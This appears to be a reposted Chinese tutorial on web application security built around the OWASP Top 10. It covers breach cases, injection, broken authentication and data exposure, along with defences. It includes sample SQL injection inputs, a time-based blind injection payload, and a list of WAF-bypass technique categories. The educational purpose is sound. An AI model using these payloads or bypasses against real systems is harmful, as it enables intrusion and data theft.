3atv精品不卡视频,97人人超碰国产精品最新,中文字幕av一区二区三区人妻少妇,久久久精品波多野结衣,日韩一区二区三区精品

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

WebApp 安全入门

發(fā)布時(shí)間:2023/12/10 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 WebApp 安全入门 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

2018 網(wǎng)絡(luò)安全事故頻發(fā),從數(shù)據(jù)泄露、信息竊取,到 DDOS 攻擊、勒索病毒,不僅威脅的總數(shù)在增加,威脅態(tài)勢(shì)也變得更加多樣化,攻擊者在不斷開發(fā)新的攻擊途徑的同時(shí),也盡力在攻擊過程中掩蓋其蹤跡,使網(wǎng)絡(luò)安全防護(hù)變得越發(fā)棘手。

未來是萬物互聯(lián)的時(shí)代,唯有把握住網(wǎng)絡(luò)信息安全,才能避免被降維打擊。本次分享,葡萄城技術(shù)團(tuán)隊(duì)將從 WebApp 安全出發(fā),帶你了解更多意想不到的安全防護(hù)措施與黑客攻擊手段,助你提高網(wǎng)絡(luò)安全意識(shí),最終學(xué)會(huì)如何提高風(fēng)險(xiǎn)意識(shí),避免遭受網(wǎng)絡(luò)安全攻擊。

本場(chǎng) Chat 核心內(nèi)容:

  • 第一節(jié):WebApp 安全風(fēng)險(xiǎn)和防護(hù)(PPT Page 1~7)
    • WebApp 安全現(xiàn)狀分析
    • 2018 網(wǎng)絡(luò)安全事故
    • 黑客如何攻擊系統(tǒng)
    • OWASP Top 10 簡(jiǎn)介
  • 第二節(jié):WebApp 風(fēng)險(xiǎn)講解(上)(PPT Page 8~10)
    • 注入
    • 失效的身份認(rèn)證
    • 敏感數(shù)據(jù)泄露
  • 第三節(jié):WebApp 風(fēng)險(xiǎn)講解(下)(PPT Page 11~18)
    • XML 外部實(shí)體
    • 其他常見的風(fēng)險(xiǎn)
    • 我們能做什么

2018 網(wǎng)絡(luò)安全事故頻發(fā),從數(shù)據(jù)泄露、信息竊取,到 DDOS 攻擊、勒索病毒,不僅威脅的總數(shù)在增加,威脅態(tài)勢(shì)也變得更加多樣化,攻擊者在不斷開發(fā)新的攻擊途徑的同時(shí),也盡力在攻擊過程中掩蓋其蹤跡,使網(wǎng)絡(luò)安全防護(hù)變得越發(fā)棘手。

未來是萬物互聯(lián)的時(shí)代,唯有把握住網(wǎng)絡(luò)信息安全,才能避免被降維打擊。本場(chǎng) Chat,我們特邀 Carl 作為分享嘉賓,于葡萄城技術(shù)公開課上,以 WebApp 安全防護(hù)為出發(fā)點(diǎn),帶你了解更多意想不到的安全防護(hù)措施與黑客攻擊手段,助你提高網(wǎng)絡(luò)安全意識(shí),最終學(xué)會(huì)如何規(guī)避風(fēng)險(xiǎn)隱患,避免遭受網(wǎng)絡(luò)安全攻擊。

下面開始展開正文。

開闊眼界 – 提升安全意識(shí)

提升網(wǎng)絡(luò)安全意識(shí)對(duì)項(xiàng)目團(tuán)隊(duì)中的每一個(gè)角色、每一個(gè)流程都至關(guān)重要。同時(shí),也只有具備了網(wǎng)絡(luò)安全意識(shí),才愿意為數(shù)據(jù)安全投入更多的時(shí)間和精力。下面,我將為您展示部分 2018 年發(fā)生的網(wǎng)絡(luò)安全事故,這些事故造成的損失,也許遠(yuǎn)遠(yuǎn)超出你的想象。

2018 網(wǎng)絡(luò)安全事故回顧

Facebook 數(shù)據(jù)泄露事件: 2018年9月,Facebook 因安全系統(tǒng)漏洞而遭受黑客攻擊,導(dǎo)致約 5000 萬用戶信息泄露。

上市公司數(shù)據(jù)堂,涉嫌侵犯數(shù)百億條公民個(gè)人信息: 大數(shù)據(jù)行業(yè)知名企業(yè)數(shù)據(jù)堂在短短 8 個(gè)月的時(shí)間內(nèi),日均泄露公民個(gè)人信息 1.3 億余條,累計(jì)傳輸數(shù)據(jù)壓縮后約為 4000GB。

圓通 10 億快遞信息泄露: 10 億條用戶數(shù)據(jù)遭公開售賣,這些數(shù)據(jù)包括寄(收)件人姓名、電話、地址等隱私信息。

萬豪酒店 5 億用戶開房信息泄露: 萬豪酒店客房預(yù)訂數(shù)據(jù)庫遭黑客入侵,約5億名客戶的信息可能被泄露。

更多數(shù)據(jù)泄露事件

  • 國泰航空數(shù)據(jù)泄露,940萬乘客受影響
  • MongoDB 數(shù)據(jù)庫被入侵, 1100 萬份郵件記錄遭泄露
  • SHEIN 數(shù)據(jù)泄露影響 642 萬用戶
  • GovPayNet憑證系統(tǒng)存在漏洞,1400萬交易記錄被曝光
  • 小米有品平臺(tái)泄露個(gè)人隱私 約2000萬用戶數(shù)據(jù)遭泄露
  • 勒索病毒事件

  • 美國亞特蘭大市政府受到勒索軟件攻擊
  • 美國巴爾的摩市遭遇勒索軟件攻擊,導(dǎo)致 911 緊急調(diào)度服務(wù)的計(jì)算機(jī)輔助調(diào)度(CAD)功能掉線
  • 臺(tái)積電勒索病毒事件,約造成 17.6 億元的營(yíng)收損失,股票市值下跌78億
  • 很多個(gè)人電腦和中小網(wǎng)站都曾遭受攻擊
  • DDoS 攻擊

  • 平昌冬奧會(huì)開幕式服務(wù)器遭到身份不明的黑客入侵
  • GitHu b遭 1.35T 級(jí)流量攻擊
  • 年度重大漏洞盤點(diǎn)

  • CPU 數(shù)據(jù)緩存機(jī)制漏洞
  • iOS 平臺(tái) WebView 組件漏洞(UIWebView/ WKWebView)跨域訪問漏洞(CNNVD-201801-515)
  • Oracle WebLogic Server WLS 核心組件遠(yuǎn)程代碼執(zhí)行漏洞
  • 微信支付 SDKXX E漏洞
  • Apache Struts2 S2-057 安全漏洞
  • 知己知彼 – 黑客如何攻擊系統(tǒng)

    一名黑客攻擊網(wǎng)站的典型步驟,主要分為以下 5 步:

  • 信息收集和漏洞掃描
  • 漏洞利用
  • 上傳木馬
  • 獲取服務(wù)器的控制權(quán)
  • 清理痕跡
  • 黑客不是手動(dòng)測(cè)試系統(tǒng)漏洞的,而是有很多強(qiáng)大的工具可以自動(dòng)化完成。黑客不是利用系統(tǒng)中的一個(gè)漏洞,而是要利用一系列,不同層次的漏洞。黑客經(jīng)常批量攻擊一系列網(wǎng)站,選取其中漏洞較多,較好利用的重點(diǎn)突破

    十大安全風(fēng)險(xiǎn)(OWASP Top 10)

    不安全的軟件正在破壞著我們的金融、醫(yī)療、國防、能源和其他重要的基礎(chǔ)設(shè)施。隨著我們的軟件變得愈加龐大、復(fù)雜且相互關(guān)聯(lián),實(shí)現(xiàn)應(yīng)用程序安全的難度也呈指數(shù)級(jí)增長(zhǎng)。而現(xiàn)代軟件開發(fā)過程的飛速發(fā)展,使得快速、準(zhǔn)確地識(shí)別軟件安全風(fēng)險(xiǎn)變得愈發(fā)的重要,OWASP 組織也因此誕生。

    OWASP,即開放式 Web 應(yīng)用程序安全項(xiàng)目(Open Web Application Security Project),作為一個(gè)開源的、非盈利的全球性安全組織,它提供了有關(guān)計(jì)算機(jī)和互聯(lián)網(wǎng)應(yīng)用程序的公正、實(shí)際、有成本效益的信息,其目的是協(xié)助個(gè)人、企業(yè)和機(jī)構(gòu)來發(fā)現(xiàn)并使用可信賴的軟件。

    OWASP Top 10 是由 OWASP 組織公布,最具權(quán)威性的“10 項(xiàng)最嚴(yán)重的 Web 應(yīng)用程序安全風(fēng)險(xiǎn)預(yù)警”,其就安全問題從威脅性和脆弱性兩方面進(jìn)行可能性分析,并結(jié)合技術(shù)和商業(yè)影響的分析結(jié)果,輸出公認(rèn)的、最嚴(yán)重的十類 Web 應(yīng)用安全風(fēng)險(xiǎn)排名。OWASP Top 10 旨在針對(duì)上述風(fēng)險(xiǎn),提出解決方案,幫助 IT 公司和開發(fā)團(tuán)隊(duì)規(guī)范應(yīng)用程序開發(fā)流程和測(cè)試流程,提高 Web 產(chǎn)品的安全性。

    OWASP 敦促所有公司在其組織內(nèi)采用 OWASP Top 10 文檔,并確保其 Web 應(yīng)用程序最大限度地降低這些風(fēng)險(xiǎn),采用 OWASP Top 10 可能是將企業(yè)內(nèi)的軟件開發(fā)文化轉(zhuǎn)變?yōu)樯砂踩a文化最行之有效的一步。

    OWASP Top 10 包括

  • 注入
  • 失效的身份認(rèn)證
  • 敏感信息泄露
  • XML 外部實(shí)體(XXE)
  • 失效的訪問控制
  • 安全配置錯(cuò)誤
  • 跨站腳本(XSS)
  • 不安全的反序列化
  • 使用含有已知漏洞的組件
  • 不足的日志記錄和監(jiān)控
  • OWASP Top 10 應(yīng)用安全風(fēng)險(xiǎn)詳解

    《OWASP Top 10》的目的在于為廣大企業(yè)確定一組最嚴(yán)重的風(fēng)險(xiǎn)項(xiàng)目。對(duì)于其中的每一項(xiàng)風(fēng)險(xiǎn),我們將使用基于 OWASP 風(fēng)險(xiǎn)等級(jí)排序的評(píng)級(jí)方案,為您提供關(guān)于漏洞普遍性、可檢測(cè)性、業(yè)務(wù)/技術(shù)影響等信息。

    注入

    將不受信任的數(shù)據(jù)作為命令或查詢的一部分發(fā)送到解析器時(shí),會(huì)產(chǎn)生諸如 SQL 注入、NoSQL 注入、OS 注入和 LDAP 注入等注入缺陷。攻擊者的惡意數(shù)據(jù)可以誘使解析器在沒有適當(dāng)授權(quán)的情況下執(zhí)行非預(yù)期命令或訪問數(shù)據(jù)。

    可利用性:容易幾乎任何數(shù)據(jù)源都能成為注入載體,包括環(huán)境變量、所有類型的用戶、參數(shù)、外部和內(nèi)部Web服務(wù)。當(dāng)攻擊者可以向解釋器發(fā)送惡意數(shù)據(jù)時(shí),注入漏洞便可產(chǎn)生。

    普遍性:常見注入漏洞十分普遍,尤其是在遺留代碼中。注入漏洞通常能在 SQL、LDAP、XPath 或是 NoSQL 查詢語句、OS 命令、XML 解析器、SMTP 包頭、表達(dá)式語句及 ORM 查詢語句中找到。

    可檢測(cè)性:易注入漏洞很容易通過代碼審查發(fā)現(xiàn)。掃描器和模糊測(cè)試工具可以幫助攻擊者找到這些漏洞。

    技術(shù)影響:嚴(yán)重注入能導(dǎo)致數(shù)據(jù)丟失、破壞或泄露給無授權(quán)方、缺乏可審計(jì)性或是拒絕服務(wù)。注入有時(shí)甚至能導(dǎo)致主機(jī)被完全接管。

    業(yè)務(wù)影響:未知您的應(yīng)用和數(shù)據(jù)需要受到保護(hù),以避免對(duì)業(yè)務(wù)造成影響。

    自查:您的應(yīng)用程序脆弱嗎?

    當(dāng)您的應(yīng)用有如下情況時(shí),是脆弱且易受到攻擊的:

  • 用戶提供的數(shù)據(jù)沒有經(jīng)過應(yīng)用程序的驗(yàn)證、過濾或凈化。
  • 動(dòng)態(tài)查詢語句或非參數(shù)化的調(diào)用,在沒有上下文感知轉(zhuǎn)義的情況下,被用于解釋器。
  • 在 ORM 搜索參數(shù)中使用了惡意數(shù)據(jù),這樣搜索就獲得包含敏感或未授權(quán)的數(shù)據(jù)。
  • 惡意數(shù)據(jù)直接被使用或連接,諸如 SQL 語句或命令在動(dòng)態(tài)查詢語句、命令或存儲(chǔ)過程中包含結(jié)構(gòu)和惡意數(shù)據(jù)。
  • 一些常見的注入,包括:SQL、OS 命令、ORM、LDAP 和表達(dá)式語言(EL)或 OGNL 注入。

    所有編譯器的原理都是相似的,因此 Code Review 是目前為止最有效的檢測(cè)應(yīng)用程序注入風(fēng)險(xiǎn)的辦法之一。當(dāng)然,您也可以對(duì)代碼中所有參數(shù)、字段、頭、cookie、JSON 和 XML 數(shù)據(jù)輸入進(jìn)行 DAST 掃描,并將 SAST 和 DAST 工具添加到 CI/CD 進(jìn)程中,以便在項(xiàng)目部署前對(duì)現(xiàn)有代碼或新代碼進(jìn)行注入檢測(cè)。

    如何防止注入?

    防止注入漏洞需要將數(shù)據(jù)與命令語句、查詢語句分隔開來:

  • 最佳選擇是使用安全的 API,完全避免使用解釋器,或提供參數(shù)化界面的 API,或遷移到 ORM 或?qū)嶓w框架中。(注意:當(dāng)參數(shù)化時(shí),如果 PL/SQL 或 T-SQL 將查詢和數(shù)據(jù)連接在一起,或者執(zhí)行帶有立即執(zhí)行或 exec() 的惡意數(shù)據(jù),存儲(chǔ)過程仍然可以引入 SQL 注入漏洞。)
  • 使用正確或符合“白名單”規(guī)范的輸入驗(yàn)證方法,同樣有助于防止注入攻擊,但這很可能引起用戶的吐槽,因?yàn)樵S多應(yīng)用程序在輸入中需要特殊字符,如文本區(qū)域或移動(dòng)應(yīng)用程序的 API。
  • 對(duì)于所有動(dòng)態(tài)查詢,可以使用該解釋器的特定轉(zhuǎn)義語法轉(zhuǎn)義特殊字符。OWASP 的 Java Encoder 和類似的庫提供了這樣的轉(zhuǎn)義例程。(注意:在 SQL 結(jié)構(gòu)中,表名、列名等無法轉(zhuǎn)義,因此用戶提供的結(jié)構(gòu)往往是非常危險(xiǎn)的。)
  • 在查詢中使用 LIMIT 和其他 SQL 控件,防止在 SQL 注入時(shí)引發(fā)大量數(shù)據(jù)泄露。
  • 攻擊案例場(chǎng)景

    場(chǎng)景#1:應(yīng)用程序在脆弱的 SQL 語句結(jié)構(gòu)中使用不可信數(shù)據(jù):String query = "SELECT * FROM accounts WHEREcustID='" + request.getParameter("id") + "'“;

    場(chǎng)景#2:框架應(yīng)用的盲目信任,也可能導(dǎo)致查詢語句的漏洞。(例如:Hibernate查詢語言(HQL)):Query HQLQuery = session.createQuery("FROM accountsWHERE custID='" + request.getParameter("id") + "'");

    在這兩個(gè)案例中,攻擊者在瀏覽器中將“id”參數(shù)的值修改成: ’or’1’=’1。例如:http://example.com/app/accountView?id=' or '1'='1這樣查詢語句的意義就變成了從 accounts 表中返回所有記錄。

    SQL 盲注

    SQL 盲注,就是在 SQL 語句注入后且成功執(zhí)行時(shí),執(zhí)行的結(jié)果不能回顯到前端頁面。此時(shí),我們需要利用一些方法進(jìn)行判斷或者嘗試,這個(gè)過程稱之為盲注。

    盲注一般分為三類:

    一、基于布爾的盲注

    基于布爾的盲注通常使用邏輯判斷推測(cè)獲取的數(shù)據(jù),通過給定條件,服務(wù)器返回真或假。使用二分法或者正則表達(dá)式等方法即可縮小判斷的范圍。

    二、基于時(shí)間的盲注

    主要是利用延時(shí)或者執(zhí)行的時(shí)間來判斷。

    If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判斷語句,條件為假,執(zhí)行 sleep

    因?yàn)檠訒r(shí)會(huì)受到網(wǎng)絡(luò)環(huán)境的影響,因此這種方法不是很可靠。

    三、基于報(bào)錯(cuò)的盲注

    構(gòu)造 payload 讓信息通過錯(cuò)誤提示顯示。

    count(*) 和 rand(0) 和 group by 報(bào)錯(cuò)

    rand(0) 是偽隨機(jī)數(shù)列,01101100。產(chǎn)生報(bào)錯(cuò)的原因是因?yàn)?rand(0) 并不是一個(gè)定值,相當(dāng)于一個(gè)變量。使用 group by 時(shí),會(huì)建立一張?zhí)摂M表,字段為 key 和 count(*)。執(zhí)行插入操作,第一次返回 0,但虛擬表中沒有這個(gè)項(xiàng),數(shù)據(jù)庫會(huì)認(rèn)為需要插入這個(gè)項(xiàng),但數(shù)據(jù)庫并沒有記錄下來,因此,會(huì)再次執(zhí)行 rand(0) 試圖獲取,但此時(shí)獲取的是第二個(gè)數(shù)。依次類推,當(dāng)數(shù)據(jù)庫查詢發(fā)現(xiàn) 0 這個(gè)項(xiàng)不存在,執(zhí)行插入操作時(shí), rand(0) 返回值為 1,但是 1 已經(jīng)存在,這時(shí)插入已經(jīng)存在的項(xiàng)就會(huì)報(bào)錯(cuò)。

    WAF 繞過

    之所以要談到 WAF 的常見特征,是為了更好的了解 WAF 的運(yùn)行機(jī)制,以便增加繞過 WAF 的機(jī)會(huì)。總體來說,WAF(Web Application Firewall)具有以下四個(gè)方面的功能:

  • 審計(jì)設(shè)備:用來截獲所有 HTTP 數(shù)據(jù)或者僅僅滿足某些規(guī)則的會(huì)話;
  • 訪問控制設(shè)備:用來控制對(duì) Web 應(yīng)用的訪問,既包括主動(dòng)安全模式也包括被動(dòng)安全模式;
  • 架構(gòu)/網(wǎng)絡(luò)設(shè)計(jì)工具:當(dāng)運(yùn)行在反向代理模式,他們被用來分配職能,集中控制,虛擬基礎(chǔ)結(jié)構(gòu)等;
  • WEB 應(yīng)用加固工具:這些功能增強(qiáng)被保護(hù) Web 應(yīng)用的安全性,它不僅能夠屏蔽 WEB 應(yīng)用固有弱點(diǎn),而且能夠保護(hù) WEB 應(yīng)用編程錯(cuò)誤導(dǎo)致的安全隱患。
  • WAF過濾機(jī)制:

  • 異常檢測(cè)協(xié)議:拒絕不符合 HTTP 標(biāo)準(zhǔn)的請(qǐng)求;
  • 增強(qiáng)的輸入驗(yàn)證:代理和服務(wù)端的驗(yàn)證,而不只是限于客戶端驗(yàn)證;
  • 白名單&黑名單:白名單適用于穩(wěn)定的 Web 應(yīng)用,黑名單適合處理已知問題;
  • 基于規(guī)則和基于異常的保護(hù):基于規(guī)則更多的依賴黑名單機(jī)制,基于異常更為靈活;
  • 狀態(tài)管理:重點(diǎn)進(jìn)行會(huì)話保護(hù);
  • 其他:Cookies 保護(hù)、抗入侵規(guī)避技術(shù)、響應(yīng)監(jiān)視和信息泄露保護(hù)等。
  • 繞過 WAF 的方法:

    從目前能找到的資料來看,繞過WAF的技術(shù)主要分為9類,包含:

  • 大小寫混合(最簡(jiǎn)單的繞過技術(shù),用于只針對(duì)小寫或大寫的關(guān)鍵字匹配技術(shù))
  • 替換關(guān)鍵字(這種方式大小寫轉(zhuǎn)化無法繞過,而且正則表達(dá)式會(huì)替換或刪除 select、union 這些關(guān)鍵字,如果只匹配一次就很容易繞過)
  • 使用編碼(URL 編碼、Unicode 編碼)
  • 使用注釋(普通注釋、內(nèi)聯(lián)注釋)
  • 等價(jià)函數(shù)與命令(有些函數(shù)或命令因其關(guān)鍵字被檢測(cè)出來而無法使用,但是在很多情況下可以使用與之等價(jià)或類似的代碼替代其使用)
  • 特殊符號(hào)(特殊符號(hào)有特殊的含義和用法,涉及信息量比前面提到的幾種都要多)
  • HTTP 參數(shù)控制(這里 HTTP 參數(shù)控制除了對(duì)查詢語句的參數(shù)進(jìn)行篡改,還包括 HTTP 方法、HTTP 頭的控制)
  • 緩沖區(qū)溢出(緩沖區(qū)溢出用于對(duì)付 WAF,有不少 WAF 是 C 語言寫的,而 C 語言自身沒有緩沖區(qū)保護(hù)機(jī)制,因此如果 WAF 在處理測(cè)試向量時(shí)超出了其緩沖區(qū)長(zhǎng)度,就會(huì)引發(fā) bug 從而實(shí)現(xiàn)繞過)
  • 整合繞過(整合的意思是結(jié)合使用前面談到的各種繞過技術(shù),單一的技術(shù)可能無法繞過過濾機(jī)制,但是多種技術(shù)的配合使用成功的可能性就會(huì)增加不少。除非每一種技術(shù)單獨(dú)都無法使用,否則它們能產(chǎn)生比自身大得多的能量。)
  • 身份認(rèn)證失效

    通過錯(cuò)誤地使用 Web 應(yīng)用程序的身份認(rèn)證和會(huì)話管理功能,攻擊者能夠破譯密碼、密鑰和會(huì)話令牌,或者利用其它開發(fā)缺陷來暫時(shí)性或永久性地冒充管理員的身份。

    可利用性:容易攻擊者可以輕松獲取數(shù)百萬條有效用戶名和密碼組合,包括證書、默認(rèn)的賬戶管理列表、自動(dòng)的暴力破解和字典攻擊工具,以及高級(jí)的 GPU 破解工具。會(huì)話管理可以很容易地被利用,尤其是沒有過期的會(huì)話密匙。

    普遍性:常見大多數(shù)管理系統(tǒng)的設(shè)計(jì)和實(shí)現(xiàn),都存在身份認(rèn)證失效的問題。會(huì)話管理是身份驗(yàn)證和訪問控制的基礎(chǔ),并且存在于整個(gè)應(yīng)用程序的進(jìn)程中。

    可檢測(cè)性:一般攻擊者通常使用指南手冊(cè)來檢測(cè)失效的身份驗(yàn)證。除此之外,也會(huì)關(guān)注密碼轉(zhuǎn)儲(chǔ)、字典攻擊,或者在類似釣魚、社會(huì)工程攻擊后,發(fā)現(xiàn)失效的身份認(rèn)證。

    技術(shù)影響:嚴(yán)重攻擊者只需訪問幾個(gè)賬戶,或者一個(gè)管理員賬戶就可以破壞我們的系統(tǒng)。根據(jù)應(yīng)用程序業(yè)務(wù)場(chǎng)景的不同,可能會(huì)導(dǎo)致洗錢、欺詐、用戶身份盜竊、泄露法律保護(hù)的敏感信息等嚴(yán)重違法行為。

    自查:您的應(yīng)用程序脆弱嗎?

    確認(rèn)用戶身份、身份驗(yàn)證和會(huì)話管理非常重要,這些措施可用于將惡意的、未經(jīng)身份驗(yàn)證的攻擊者與授權(quán)用戶進(jìn)行分離。如果您的應(yīng)用程序存在如下問題,那么可能存在身份驗(yàn)證失效漏洞:

  • 允許憑證填充,攻擊者可利用此獲得有效的用戶名和密碼。
  • 允許暴力破解或其他自動(dòng)攻擊。
  • 使用默認(rèn)、弱安全性的密碼,例如“Password1”或“admin/admin”。
  • 使用弱安全性或失效的驗(yàn)證憑證。
  • 使用明文、加密或弱散列密碼。
  • 缺少或失效的多因素身份驗(yàn)證。
  • 暴露 URL 中的會(huì)話 ID(例如 URL 重寫)。
  • 在成功登錄后不會(huì)更新會(huì)話 ID。
  • 不正確地使會(huì)話 ID 失效。當(dāng)用戶不活躍的時(shí)候,用戶會(huì)話或認(rèn)證令牌(特別是單點(diǎn)登錄(SSO)令牌)沒有正確注銷或失效。
  • 如何防止?

  • 在盡可能的情況下,使用多因素身份驗(yàn)證,以防止憑證填充、暴力破解和被盜憑據(jù)再利用攻擊。
  • 不要使用已發(fā)送或部署默認(rèn)的憑證,特別是管理員用戶。
  • 定期執(zhí)行弱密碼檢查。
  • 將密碼長(zhǎng)度、復(fù)雜性和循環(huán)策略與 NIST-800-63 B 的指導(dǎo)方針或其他現(xiàn)代的密碼策略保持一致。
  • 確認(rèn)注冊(cè)、憑據(jù)恢復(fù)和 API 路徑,確保對(duì)所有輸出結(jié)果使用相同的消息,用以抵御賬戶枚舉攻擊。
  • 限制或逐漸延遲失敗的登錄嘗試。記錄所有失敗信息并在憑據(jù)填充、暴力破解或其他攻擊被檢測(cè)時(shí)提醒系統(tǒng)管理員。
  • 使用服務(wù)器端內(nèi)置的會(huì)話管理器,在登錄后生成高度復(fù)雜且不存在于 URL 的隨機(jī)會(huì)話 ID。這樣當(dāng)用戶登出、閑置、絕對(duì)超時(shí)后使其失效。
  • 攻擊案例場(chǎng)景

    場(chǎng)景#1:最常見的攻擊方式——憑證填充,使用已知密碼的列表。如果應(yīng)用程序不限制身份驗(yàn)證嘗試次數(shù),則可以將應(yīng)用程序用作密碼 oracle, 以確定憑證是否有效。

    場(chǎng)景#2:大多數(shù)身份驗(yàn)證攻擊都是由于密碼作為唯一的認(rèn)證因素。

    場(chǎng)景#3:應(yīng)用會(huì)話超時(shí)設(shè)置不正確。用戶使用公共計(jì)算機(jī)訪問應(yīng)用程序時(shí),直接關(guān)閉瀏覽器選項(xiàng)卡就離開,而不是選擇“注銷”。

    憑據(jù)填充(撞庫)

    撞庫,是黑客通過收集互聯(lián)網(wǎng)已泄露的用戶和密碼信息,生成對(duì)應(yīng)的字典表,嘗試批量登陸其他網(wǎng)站后,得到一系列可以登錄的用戶。很多用戶在不同網(wǎng)站使用的是相同的賬號(hào)和密碼,因此黑客可以通過獲取用戶在 A 網(wǎng)站的賬戶從而嘗試登錄 B 網(wǎng)站,這就是撞庫攻擊。

    撞庫可以通過數(shù)據(jù)庫安全防護(hù)技術(shù)解決,數(shù)據(jù)庫安全技術(shù)包括:數(shù)據(jù)庫漏掃、數(shù)據(jù)庫加密、數(shù)據(jù)庫防火墻、數(shù)據(jù)脫敏、數(shù)據(jù)庫安全審計(jì)系統(tǒng)。

    撞庫并不神秘,事實(shí)上,它正被廣泛的使用。舉例而言,根據(jù) Shape Security 的報(bào)告,“攻擊者們一旦鎖定了一個(gè)財(cái)富 100 強(qiáng)的 B2C(企業(yè)對(duì)消費(fèi)者)網(wǎng)站,就會(huì)在一個(gè)星期內(nèi)使用遍布世界各地的代理服務(wù)器,對(duì)其進(jìn)行超過五百萬次登錄嘗試。” 雪上加霜的是,被竊取的憑證也并不難找。黑客們會(huì)為了找樂子或?qū)で髶P(yáng)名立萬的機(jī)會(huì)把憑證散播到網(wǎng)上。當(dāng)黑客們?cè)趹{證黑市(比如 Cracking-dot-org、 Crackingking-dot-org 以及 Crackingseal-dot-io)做生意時(shí),這些名聲會(huì)派上大用場(chǎng)。

    多因素驗(yàn)證

    多因素驗(yàn)證(Multi-factor authentication,縮寫為 MFA),又譯多因子認(rèn)證、多因素認(rèn)證,是一種計(jì)算機(jī)訪問控制的方法,用戶要通過兩種以上的認(rèn)證機(jī)制之后,才能得到授權(quán),使用計(jì)算機(jī)資源。例如,用戶要輸入 PIN 碼,插入銀行卡,最后再經(jīng)指紋比對(duì),通過這三種認(rèn)證方式,才能獲得授權(quán)。這種認(rèn)證方式可以提高安全性。

    敏感數(shù)據(jù)泄露

    許多 Web 應(yīng)用程序和 API 都無法正確保護(hù)敏感數(shù)據(jù),例如:財(cái)務(wù)數(shù)據(jù)、醫(yī)療數(shù)據(jù)和PII數(shù)據(jù)。攻擊者可以通過竊取或修改未加密的數(shù)據(jù)來實(shí)施信用卡詐騙、身份盜竊或其他犯罪行為。未加密的敏感數(shù)據(jù)容易受到破壞,因此,我們需要對(duì)敏感數(shù)據(jù)加密,這些數(shù)據(jù)包括:傳輸過程中的數(shù)據(jù)、存儲(chǔ)的數(shù)據(jù)以及瀏覽器的交互數(shù)據(jù)。

    可利用性:一般攻擊者并非直接攻擊,而是在傳輸過程中、從客戶端(例如:瀏覽器)竊取密鑰、發(fā)起中間人攻擊,或從服務(wù)器端直接竊取明文數(shù)據(jù)。

    普遍性:廣泛這是最常見,也是最具影響力的攻擊手段。在數(shù)據(jù)加密的過程中,由于不安全的密鑰生成、管理以及使用弱加密算法、弱協(xié)議和弱密碼(未加鹽的哈希算法或弱哈希算法),導(dǎo)致數(shù)據(jù)泄露事件頻發(fā)。

    可檢測(cè)性:一般在服務(wù)器端,檢測(cè)傳輸過程中的數(shù)據(jù)弱點(diǎn)很容易,但檢測(cè)存儲(chǔ)數(shù)據(jù)的弱點(diǎn)卻異常困難。

    技術(shù)影響:嚴(yán)重敏感數(shù)據(jù)泄露事件造成的影響是非常嚴(yán)重的,因?yàn)檫@些數(shù)據(jù)通常包含了很多個(gè)人信息(PII),例如:醫(yī)療記錄、認(rèn)證憑證、個(gè)人隱私、信用卡信息等。這些信息受到相關(guān)法律和條例的保護(hù),例如:歐盟《通用數(shù)據(jù)保護(hù)條例》(GDPR)和地方隱私保護(hù)法律。

    自查:您的應(yīng)用程序脆弱嗎?

    首先你需要確認(rèn)哪些數(shù)據(jù)(包含:傳輸過程中的數(shù)據(jù)、存儲(chǔ)數(shù)據(jù))是敏感數(shù)據(jù)。例如:密碼、信用卡卡號(hào)、醫(yī)療記錄、個(gè)人信息等,這些數(shù)據(jù)應(yīng)該被加密,請(qǐng)Review:

  • 在數(shù)據(jù)傳輸過程中是否使用明文傳輸?這和傳輸協(xié)議相關(guān),如:HTTP、SMTP 和 FTP。(注意:外網(wǎng)流量十分危險(xiǎn),請(qǐng)驗(yàn)證所有的內(nèi)部通信,如:負(fù)載平衡器、Web 服務(wù)器或后端系統(tǒng)之間的通信。)
  • 當(dāng)數(shù)據(jù)被長(zhǎng)期存儲(chǔ)時(shí),無論存儲(chǔ)在哪里,它們是否都被加密或備份?
  • 無論默認(rèn)條件還是源代碼中,是否還在使用任何舊的、脆弱的加密算法?
  • 是否使用默認(rèn)加密密鑰,生成或重復(fù)使用脆弱的加密密鑰,或者缺少恰當(dāng)?shù)拿荑€管理或密鑰回轉(zhuǎn)?
  • 是否強(qiáng)制加密敏感數(shù)據(jù),例如:用戶代理(如:瀏覽器)指令,傳輸協(xié)議是否被加密?
  • 用戶代理(如:應(yīng)用程序、郵件客戶端)是否未驗(yàn)證服務(wù)器端證書的有效性?
  • 如何防止?

    對(duì)一些需要加密的敏感數(shù)據(jù),應(yīng)該做到以下幾點(diǎn):

  • 對(duì)系統(tǒng)處理、存儲(chǔ)或傳輸?shù)臄?shù)據(jù)分類,并根據(jù)分類分別進(jìn)行訪問控制。
  • 熟悉與敏感數(shù)據(jù)保護(hù)相關(guān)的法律和條例,并根據(jù)每項(xiàng)法規(guī)的要求保護(hù)敏感數(shù)據(jù)。
  • 對(duì)于沒必要存放,但重要的敏感數(shù)據(jù),應(yīng)當(dāng)盡快清除,或者通過 PCI DSS 標(biāo)記或攔截,只有未存儲(chǔ)的數(shù)據(jù)才不會(huì)被竊取。
  • 確保已存儲(chǔ)的所有敏感數(shù)據(jù)都被加密。
  • 確保使用了最新、強(qiáng)大的標(biāo)準(zhǔn)算法或密碼、參數(shù)、協(xié)議和密鑰,并且密鑰管理到位。
  • 確保傳輸過程中的數(shù)據(jù)被加密,如:使用 TLS。
  • 確保數(shù)據(jù)加密被強(qiáng)制執(zhí)行,如:使用 HTTP 嚴(yán)格安全傳輸協(xié)議(HSTS )。
  • 禁止緩存對(duì)包含敏感數(shù)據(jù)的響應(yīng)。
  • 確保使用密碼專用算法存儲(chǔ)密碼,如:Argon2 、scrypt 、bcrypt 或PBKDF2 。
  • 將工作因素(延遲因素)設(shè)置在可接受的范圍。
  • 單獨(dú)驗(yàn)證每個(gè)安全配置項(xiàng)的有效性。
  • 攻擊案例場(chǎng)景

    場(chǎng)景 #1:假設(shè)一個(gè)應(yīng)用程序使用自動(dòng)化的數(shù)據(jù)加密系統(tǒng)加密了信用卡信息,并存儲(chǔ)在數(shù)據(jù)庫中,當(dāng)數(shù)據(jù)被檢索時(shí)自動(dòng)解密。這會(huì)導(dǎo)致 SQL 注入漏洞能夠以明文形式獲得所有信用卡卡號(hào)。

